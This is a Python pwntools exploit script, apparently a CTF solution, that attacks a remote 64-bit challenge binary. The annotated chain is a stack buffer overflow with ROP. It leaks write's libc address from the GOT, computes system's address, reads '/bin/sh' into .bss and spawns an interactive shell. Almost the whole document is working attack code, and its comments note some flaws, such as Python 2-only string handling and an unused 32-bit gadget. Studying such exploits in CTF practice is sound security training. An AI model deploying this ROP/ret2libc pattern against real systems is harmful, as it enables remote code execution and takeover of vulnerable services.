64비트로 바뀌었습니다.
from pwn import *
# 64-bit variant of the earlier rop32 solution, same three-stage pattern:
# (1) leak write's libc address, (2) read "/bin/sh" into .bss, (3) call system.
# On x86-64 the arguments travel in registers, so each stage needs pop gadgets.
# NOTE(review): str and bytes are concatenated directly ('A' * 8 + p64(...));
# that only works with Python 2 pwntools -- under Python 3 it raises TypeError.
context.log_level = 'debug'   # echoes every byte sent/received; handy for checking the leak parsing below
e = ELF('./rop64_v2')
p = remote("sunrin.site", 9007)
libc = ELF('./libc.so.6')    # the challenge's libc; the symbol offsets used below are only valid for this exact build
# Gadget addresses are hard-coded, so the binary is presumably built without PIE (confirm with checksec).
prdi = 0x00000000004005f3     # named as a "pop rdi; ret" gadget: sets the first call argument
prsir15 = 0x00000000004005f1  # named as a "pop rsi; pop r15; ret" gadget: sets the second argument, r15 gets filler
pppret = 0x080486b9           # unused in this script; looks like a leftover 32-bit gadget from the rop32 version
# Stage 1: write(1, &GOT[write], rdx), then return into main so a second overflow is possible.
payload = 'A' * (0x10 + 8)    # 0x10-byte buffer plus 8 bytes of saved rbp -- presumably; verify against the stack layout
payload += p64(prdi)
payload += p64(1)             # rdi = 1 (stdout)
payload += p64(prsir15)
payload += p64(e.got['write'])  # rsi = write's GOT entry, which holds the resolved libc address
payload += 'A' * 8            # consumed by the extra "pop r15"
payload += p64(e.plt['write'])
payload += p64(e.sym['main'])   # back to main for stage 2
# NOTE: rdx (the byte count) is never set by this chain; it is whatever the previous call left there.
p.sendlineafter("World\n", payload)
# Leak: read up to the 0x7f byte that typically ends a userland libc address, zero-extend to 8 bytes, unpack.
# Anything the program prints before the address would also end up in this buffer -- check it in the debug log.
_write = u64(p.recvuntil('\x7f').ljust(8, '\x00'))
base = _write - libc.symbols['write']   # libc load base = leaked write address minus write's offset inside libc
system = base + libc.sym['system']
binsh = e.bss() + 0x10                  # writable scratch space in .bss for the "/bin/sh" string
# Stage 2: read(0, binsh, rdx) to place the command string in .bss, then back to main again.
payload = 'A' * (0x10 + 8)
payload += p64(prdi)
payload += p64(0)             # rdi = 0 (stdin)
payload += p64(prsir15)
payload += p64(binsh)         # rsi = destination buffer
payload += 'A' * 8            # filler for r15
payload += p64(e.plt['read'])
payload += p64(e.sym['main'])
p.sendline(payload)
p.sendline('/bin/sh\x00')     # this is the data the read(2) above copies into binsh
# Stage 3: system(binsh).
payload = 'A' * (0x10 + 8)
payload += p64(prdi)
payload += p64(binsh)         # rdi = pointer to the "/bin/sh" string written in stage 2
payload += p64(system)
p.sendline(payload)
p.interactive()               # hand the connection over to the user